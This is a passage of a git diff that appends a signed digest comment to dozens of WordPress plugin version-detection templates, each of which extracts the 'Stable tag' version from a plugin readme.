b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index 3fe86debf5..e302599f22 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022027ae21f8c1c7e9d0be6fbdf14e8a3d775fa85b6cfc3ca1a6039971354b0a4c9e02202bdab28c5d3a9c43f37b4bccf990bb8be8ccbf1afa630bece279c78a25b63caf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-history.yaml b/http/technologies/wordpress/plugins/simple-history.yaml index 18a7437e94..b1b45b48f1 100644 --- a/http/technologies/wordpress/plugins/simple-history.yaml +++ b/http/technologies/wordpress/plugins/simple-history.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e90ac0ab6cc825819b760502792a9084d025fdf4efb162712d468c01b65e7ac702205c4873054998821d4e2118a80cab9b2147d7515b177c89982a7753e398a407d4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index 3deac58709..0e97086154 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220132138a113c070e657647d28b7942aad07aaee32f41f03e6026b9c9348b9d7c40221009bfd394ccb40def2634bade7678fecf0120ed68f7d1d4bedcadaabbbeed10c73:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index e7e7c27682..6d580b9d6c 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a317a517f21d40dc44b12dec80fa34dcbe8ba91f1ac8db123d6e703525e2f9e0022044fb7ae81bdc67f9b26bf9ebf19386e3fd2ddbe387cc1774f36412038f3f33df:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index ad4ebefa4b..d6a1c99c37 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220418eae59038526b5bc1839997e668bf98d06240f43c1db328cb709d13acb416a022020e09492778ab46ecb5002291bf67a0b301a8370bed9563ed83dfd54114133de:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index 8e88c81c0a..7bdf591279 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220615c910bc80f4b642c0f52ec4f6a7288585a5ec4cfef1c4df4c0bcc578653a2d022100eeb7898ad9e1f7f1815d1cc96cdc1a80b40f468164fc4043450ec1e44ccf0bc6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml index 39d269fb85..42eb6308bd 100644 --- a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e601a29c37a10da966a0c3df788da41bfa788b7e02008e352f41ebbfcfcfd237022100fc9ee46647349bedce16a0e43a762cecc7eed6e38639e85c8c4e23a75c4086b8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index fc126d83c6..b82523b7db 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100cb4edc9998251f2a1c0ad6bca7402cff7067fd598d0b14ea8320907c706e9e18022100b47f9b96abd3056dcaaf2d2b7d2784be1d86347100deade29f15fc063a90b86c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index 8c49a34259..8d054ccde3 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022005c05a4c6942926bae12f313220a77b1b7d581e7a79a9cd72c3660eb5d15fccd02207ba66684db114ca760ea2886ff0bdabff61a3781acf6d03975c1f54c2550f770:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml index c20ed6552a..24b0c6ba2c 100644 --- a/http/technologies/wordpress/plugins/svg-support.yaml +++ b/http/technologies/wordpress/plugins/svg-support.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ded162578fbfb3e474c6ca3ae58bae19797570f6ddfce3d2dfc79bcbdc11cb18022100ce607e76b8dc7891f3d7e3516ae7562a9aee344f6533f39167143126a7b92ddb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index 6ac2212b4b..36460ecb48 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210093152cb8230218542ac2ef1b9d6aed571c2feaab83e922429cc50c7e2a2caa800221008fdf667fb406e76fd56bd731c5f5348274fc25c80a1f859d679c58f84249e40d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index 71c71b5ed1..7cedebd036 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f4ab7223ddc090a92b533178e705d7cee6c68c702d32bdb1507d7ae2ef855020022100a529964b98c2362d96733c3460b9735249434eda811d0a71948d2e7627be6f7d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index 7b47adc274..d19ed0cb20 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221009fa55a264d9e31612ee536650068713f24a1fe215df6ac1b52f47cd9734bd8fc0221009dc86ba343be813a2469ed02f145da0cee359ba4fbeb839670706130bf216704:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/templately.yaml b/http/technologies/wordpress/plugins/templately.yaml index 38391bd9f3..be29960821 100644 --- a/http/technologies/wordpress/plugins/templately.yaml +++ b/http/technologies/wordpress/plugins/templately.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502202821524033efa17d2fca70ec60830134ca536067dcce79bd7114fad4419a94bd022100ac5af014ad95431c59cd220ad65a39561edb624734eb5a6beaeec021ba4ea623:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index c4928059f6..024218887e 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022051f4d8fc306599f9ffb133d3e2c5d7663be10f3e335ca10888bba09b64b7b16e022100b84979d003dfc4560b59ca852a625edd8351ed8c2f4395be6588ecd26320c081:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index f6a7836f35..6521dedde3 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402204bf1b08fee8209732204687a75ae395a84ce55b510d5a952ac4c83d335a85a39022018212b0d7af8b50c38e5c14232edb54883f6cf8b96b7111200a8ee04ef987081:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index b7af708c4f..bcceeafd87 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220384c54a9d8523620f0892e1f589f230c601e27aa519c24b3c50c302898b5275202202089d3056a12fbb0ef93ecf69b9a98ff37eb4132c4d5f9198a2c536e190f0168:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index 61a793edf7..aa508f2a62 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200d21728b5885095a2973962f564179d15e5f54b0187320c1c96abdc04a78c7ad022100dcce5bd9b309e0f574a49282c6d4147f7b46e35c0935a99c69991bbe3e992384:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index 0da88d5d3f..d8bc48b089 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221008f663ae97904ec84e48c313db50dbb42438f7d01095e1ea84ec59a21f4b28765022100e13ed266f3efe0b46b028e2e3a7411dfb1fe4d4f28d4b05a646536c61d20eaab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index 2b29428cf1..813ce9edb7 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502201c43ba4d4bd1c85cd3f250a587b4fdfa06bcabf730d94c59da3737682534f445022100cf6416bdd1dc8adb127abffd37b9eac50e15ed08adc5ca0b358e0a1414a93fe9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index 181e619a7c..a2cb00d9f9 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100faa15b270b1c9177f674598dd00767658dbf9320622036fb4a28e56d8528eae7022100925bfa4dca643f1015ebb95ef31074bf24b2b899a570bd1c9397d7df2ffbba72:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index 8164eb4483..391d7f7896 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f6a59ac4be7913afc55992663012c9052bcc88c17df23370daf66cff81fd8961022100e486d3a773249b1dc27590dec065f42b02e70f8a38cf9098d8531526fc5d63f7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index 59554defdf..588f3967e3 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100cc3ad00991b74e4b64309b4278b25ed8db827c27a7f82587a5b12e94ce25e375022017ade0c2338948189253365e75fbe2464490bd4efbcd9539180ffdc94f52d69f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index 350fd9436b..55647f9bea 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f165e0ebd95ec4f9e9fb51a8a9eb760abbd77722adab42327774a14dafe2e3a20221009c64c593f81a2f33fcc32323e047a60314dbce0514c0e9a96d1a939de1857c36:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index 2ae6bafbba..0e325a8c53 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100cef705e6829d69d725b7af0cfdcac044baee7984d5fc7e69493b5b1e880d9d8e022100b2dd450db9a4337b34bcbe0831230a5637df9a8e28ec377d48c1c1620c10fa35:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index d0dc8d92bb..2187ac0afb 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221008eeee39ff5ad98b2b4ce86d6286b5476a2ad127bc0f947c7dc7168c9cfe28128022100c4a080507b1cc60d7967f421a4cc252d34bda0c85d85c2b1a127ac2da214efab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index c49bbc2b6d..217e7b3c1a 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100867949d8c49f0573ce15f3653d1ff961f41d7df96eeb793a40498c70c6a2438a0221008e2b6830bf763f26750231cdec2268fa6e091560810b22cafcc120ca1d739eef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 27586cbd9d..0892a17c74 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203cba785d29fea62413e56d7c9773dd9766efed4feb67f3f3c65c5a413a02b385022100b63ad1ce3adcc4da90a80844eae6110327d9f6c5f663a6be0ed0bf78ed492b3a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index 946272f0a9..9c5925639b 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220008d4e347a4395ead52469baf55adce862ba5b2616e289f5f63eefbc8478965702202eebe42089288ba7b8fc1db744060fb48d1b2161da238200609921bb94bab54f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml index aa29706872..970ff8bb9f 100644 --- a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e2785f6cb930f8166543b83767865bcf955d2a7c7c81ed5f67201ff7753d476e022043f99ae69f80acbba231fc379f00c872f74f05f9f862d37008d6f566ceef1567:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index 290d53ab7e..707a2fcc3b 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ba693bb35d8a23f3649318c59d12a791fda8719fd7dd9f4e59b20d070c072ec002204048db8d3f31db6e784eadc01a06b7ee73e9a603c2aaf12a4237b54c97f53165:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index e83e8d79e7..5fb9e41303 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d4526158550ae7bc03ea6a1fde92d76e8633757e279bec6237fbb7ee1540bcc902207d643857f507cb7658cd2f934df0835409f25e180875775249e12d4cc584c624:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index f1c16275a2..44a5ecc719 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d77e4e1b54e0f79c6d10b0b94352a93a930efdd4e18ea47a55109c476a39d6aa02204da3b7e55b9822518c66d707920acf2c77118a6804c6433dcab3f0dfd45f5351:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index fc072e19d8..55dedb0cfa 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d00141ca4666d90a25ad1570387ed8230b7126bee00333d8ad59f58dea83ccf602210099a05d3b41d7fcb1ca6bf9a5a19b414f4e593bef149c6d572eaf96ad26bb9b7c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index da9df0e8a5..20104414a7 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022038b979308831a4de13336eda4eb2dc7a3a19bf69de94451dfbb812b8dd77165102204adef3cc68f6d0746135af04bb40d755962025900cc021774b4076396fa62ba0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index f8113d9750..d19a4f2107 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402204c47d6833096e5cab4083b2fd48b5308a875aa977741046106c987ccdffb2be402207d266abc4f289d7573c3de74bcc856584f144492f088d55a80cd03c72ee191c3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index 5f80282ab2..1eddc4505c 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220035dd53f1f3d4b35135626933f1b0fc69a99a8ad2989fd39522e57d15fc04489022100e3f7404699d1141f42d1e441d6a22656c050b931dfe403a9e7d43160bee53cd3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index 5725d5bb3f..74996d51ff 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b7f3bbf49eab6da3f0f7a1817d17f1e212e41c8babe48a8eafc11262d3d54ca902205e2d98a8200e91eae4f43deaf9f103f4763229efbdfa8657b39d150b18f8361c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index f67a8bc18a..0a44ff0ec3 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022001a25bb07be1b50346cde0e8efd3bd26a43e0f836126a54c2d55b224591d55040220271b89f63bb0425e87152ddac104e4c5823289bcdb2511f93d4467a89c791a01:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index b9bd4be0a8..5e7709d02f 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502205f73bcc4310995aad98286b869c1d091ba0c8752e1e79e5cce9eda82aa4256d4022100fc3e38193c19a4cad83c73afb1ffe93572de93e82a34d53313259130fa6781f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index bece4ce486..c06a4e5195 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100fe8953ad1bd0472f06dfc999bc9a89f3e0d58d0e59e827003b53ae8f81449b3b022100dd9dcc92cfad9b0227afc561a877eab2afd51c36498aa0e1d6a0b4f5755fd26e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index 138b0aa9a6..12ea9ef98b 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022063de6e7028c4eb9f2c37c23b23f0d43c3e142ac475a9bbf6e66e04edc1f5730a022100e9ea2f8b908f34b3f5cfb39ec8b1e1778761f1460ec7cd7caee7e12cfa2e75d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index 68bf71bc83..50dcf1a085 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f807ccfb94a7fa830716581ee13f251d6851482eef1fe56d602f8a09b2a196e202210082c4fe2c5747954e796fbcaccc95dca30d0da5518b7a4a6019fdb7e4009da54f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index 10dad2d2fb..9a40f12ac3 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203bef3790191d939e91d1d25aeb1d2952b858ae02093b777c479dc5848f1ac60e02204aa604f8b3d91a1ed7feeb71fb415d491e8d4a23794dae9582f1d773e4e9b5cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index e9efe6fb53..50d5419b82 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009a0aa8085acf1f93393266eff05cb5a67542e5fa2de91e6f414c6d6b9f82acfc022007957b647687643f025dd53630b93dd962e950f19d8cfa9ff89dc64e0b6c0efd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index c3d10f0135..63105125e6 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502205cc57225c18cf780973e30efb2d67288a434843cb69503b0dda6b4545d4b53b7022100d71787660fc45854f4dd3b34ad3616f97839a94f62732f89fdcbc64e2173c085:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index 4a8bc6b75c..45d1746c0f 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -46,3 +46,4 @@ http: 